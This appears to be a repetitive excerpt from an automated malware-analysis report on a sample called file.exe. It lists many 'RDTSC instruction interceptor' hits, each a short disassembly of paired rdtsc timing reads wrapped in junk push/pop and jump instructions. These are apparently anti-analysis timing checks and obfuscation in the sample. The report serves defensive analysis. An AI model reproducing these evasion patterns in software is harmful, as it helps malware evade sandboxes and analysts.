              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1B24 second address: 9B1B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jc 00007FC7B8E88BF6h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1B3A second address: 9B1B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1B40 second address: 9B1B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1B44 second address: 9B1B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FC7B8E46E48h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5DFD second address: 9B5E2E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC7B8E88C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7B8E88C02h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5E2E second address: 9B5E46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5F9E second address: 9B5FB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5FB3 second address: 9B5FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FC7B8E46E46h 0x00000014 jmp 00007FC7B8E46E4Ch 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5FD9 second address: 9B5FDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6293 second address: 9B6297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6297 second address: 9B62BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC7B8E88BFCh 0x0000000e jno 00007FC7B8E88BF6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FC7B8E88BFCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62BD second address: 9B62C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62C4 second address: 9B62D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jno 00007FC7B8E88BF6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62D0 second address: 9B62D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62D4 second address: 9B62E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62E0 second address: 9B62E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62E4 second address: 9B62E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB911 second address: 9BB939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jnp 00007FC7B8E46E48h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC7B8E46E4Fh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB939 second address: 9BB95E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC7B8E88BFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC7B8E88BFDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBD43 second address: 9BBD48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BC387 second address: 9BC3C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FC7B8E88C08h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FC7B8E88BFEh 0x00000018 jnp 00007FC7B8E88BF6h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BC67F second address: 9BC685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD4EC second address: 9BD4F6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7B8E88BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD4F6 second address: 9BD502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD502 second address: 9BD529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FC7B8E88BFCh 0x0000000b popad 0x0000000c jmp 00007FC7B8E88C04h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD529 second address: 9BD540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC7B8E46E46h 0x0000000a jmp 00007FC7B8E46E4Dh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C63D4 second address: 9C63D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5578 second address: 9C558A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007FC7B8E46E46h 0x0000000c jnl 00007FC7B8E46E46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C558A second address: 9C558E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C558E second address: 9C55A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC7B8E46E51h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C59C3 second address: 9C5A08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FC7B8E88BFEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007FC7B8E88C04h 0x00000011 pop edx 0x00000012 pushad 0x00000013 jng 00007FC7B8E88BF8h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FC7B8E88BFEh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5B8E second address: 9C5BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC7B8E46E46h 0x0000000a jmp 00007FC7B8E46E53h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5BAB second address: 9C5BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5CC8 second address: 9C5CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5CCC second address: 9C5CD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5E01 second address: 9C5E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7B8E46E46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5E0B second address: 9C5E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFDh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FC7B8E88BFCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C60C8 second address: 9C60E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FC7B8E46E46h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF160 second address: 9CF16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC7B8E88BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD5E0 second address: 9CD5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD890 second address: 9CD8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 jp 00007FC7B8E88BF6h 0x0000000c js 00007FC7B8E88BF6h 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE0DF second address: 9CE0E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE273 second address: 9CE277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE277 second address: 9CE27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE27F second address: 9CE29C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C08h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF00C second address: 9CF012 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF012 second address: 9CF025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jne 00007FC7B8E88BF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D47E6 second address: 9D47FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D47FA second address: 9D4815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FC7B8E88BFAh 0x0000000a popad 0x0000000b jp 00007FC7B8E88C19h 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D453F second address: 9D4543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E03EF second address: 9E040E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7B8E88C09h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E02A7 second address: 9E02AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E222C second address: 9E223D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E223D second address: 9E2243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916112 second address: 916117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916117 second address: 91617B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FC7B8E46E5Ch 0x0000000d jmp 00007FC7B8E46E56h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007FC7B8E46E52h 0x0000001b jnc 00007FC7B8E46E46h 0x00000021 popad 0x00000022 push edx 0x00000023 jp 00007FC7B8E46E46h 0x00000029 jng 00007FC7B8E46E46h 0x0000002f pop edx 0x00000030 push ecx 0x00000031 jmp 00007FC7B8E46E4Fh 0x00000036 pop ecx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E518C second address: 9E5190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB287 second address: 9EB28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4516 second address: 9F451C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F451C second address: 9F4529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FC7B8E46E46h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F43A0 second address: 9F43D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jne 00007FC7B8E88C05h 0x00000012 jc 00007FC7B8E88C0Ah 0x00000018 jmp 00007FC7B8E88BFEh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F827A second address: 9F8289 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7B8E46E46h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8289 second address: 9F828F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CDCB second address: 91CDD7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7B8E46E4Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CDD7 second address: 91CDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FC7B8E88BFEh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CDF4 second address: 91CE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E46E54h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CE0D second address: 91CE34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC7B8E88C06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD9B5 second address: 9FD9BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD9BB second address: 9FD9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7B8E88BFEh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC33F second address: 9FC343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC343 second address: 9FC351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC7B8E88BF8h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC351 second address: 9FC356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC4BC second address: 9FC4CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC4CC second address: 9FC4E6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7B8E46E4Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a je 00007FC7B8E46E46h 0x00000010 jo 00007FC7B8E46E4Eh 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC5E6 second address: 9FC64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC7B8E88C03h 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FC7B8E88C03h 0x00000012 pop ebx 0x00000013 push edi 0x00000014 jmp 00007FC7B8E88BFEh 0x00000019 pop edi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FC7B8E88BFEh 0x00000023 pushad 0x00000024 jmp 00007FC7B8E88C01h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC64A second address: 9FC66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E46E59h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC999 second address: 9FC9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC9A4 second address: 9FC9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC9AA second address: 9FC9B4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC7B8E88BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC9B4 second address: 9FCA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC7B8E46E4Eh 0x0000000c jmp 00007FC7B8E46E52h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jc 00007FC7B8E46E46h 0x0000001a jmp 00007FC7B8E46E4Ah 0x0000001f jmp 00007FC7B8E46E4Fh 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 jmp 00007FC7B8E46E56h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 jno 00007FC7B8E46E46h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01524 second address: A0152C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A016C0 second address: A016C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A016C4 second address: A016DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FC7B8E88C06h 0x0000000f jmp 00007FC7B8E88BFAh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A016DF second address: A016E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A016E3 second address: A016E8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A066D4 second address: A066DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A066DA second address: A066DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0651A second address: A0651E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0651E second address: A06528 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC7B8E88BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06528 second address: A0656F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 ja 00007FC7B8E46E46h 0x00000016 jmp 00007FC7B8E46E52h 0x0000001b push edi 0x0000001c pop edi 0x0000001d jmp 00007FC7B8E46E50h 0x00000022 popad 0x00000023 jno 00007FC7B8E46E4Ch 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0656F second address: A06575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1066E second address: A10684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC7B8E46E4Eh 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007FC7B8E46E46h 0x00000016 rdtsc
